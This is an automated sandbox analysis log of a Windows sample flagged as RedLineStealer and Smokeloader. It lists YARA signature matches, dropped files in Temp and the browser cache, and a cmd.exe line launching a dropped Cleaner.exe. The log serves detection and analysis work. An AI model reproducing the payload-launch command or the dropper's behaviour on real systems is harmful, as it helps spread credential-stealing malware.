Source: 00000000.00000000.307807767.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.272012058.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.255218236.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.254552831.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.300504834.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.306335009.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.286527423.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.261493549.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.270666653.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.260670257.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.293688181.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.285114416.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.265318606.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.299699149.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.292621686.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 528
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C28C2 33_2_00007FFBB00C28C2
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C2EE5 33_2_00007FFBB00C2EE5
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C1B2E 33_2_00007FFBB00C1B2E
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00CA91D 33_2_00007FFBB00CA91D
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C394F 33_2_00007FFBB00C394F
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C553E 33_2_00007FFBB00C553E
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C3F72 33_2_00007FFBB00C3F72
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C9B6D 33_2_00007FFBB00C9B6D
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C678F 33_2_00007FFBB00C678F
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C57D8 33_2_00007FFBB00C57D8
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C4601 33_2_00007FFBB00C4601
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C4EDD 33_2_00007FFBB00C4EDD
Source: file.exe Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1] C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
Source: Cleaner.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe ReversingLabs: Detection: 47%
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 528
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 700
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 732
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 744
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 776
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 900
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 964
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1152
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1280
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1272
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Cleaner.lnk.0.dr LNK file: ..\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t Jump to behavior
Source: classification engine Classification label: mal100.troj.winEXE@17/52@1/5
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5380
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: [C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdbPXC-@ source: file.exe
Source: Binary string: C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdb source: file.exe
Source: Cleaner.exe.0.dr Static PE information: 0xEAE49AF1 [Wed Nov 17 16:40:17 2094 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.920922021912582
Source: initial sample Static PE information: section name: .text entropy: 7.920922021912582
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Bunifu_UI_v1.5.3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
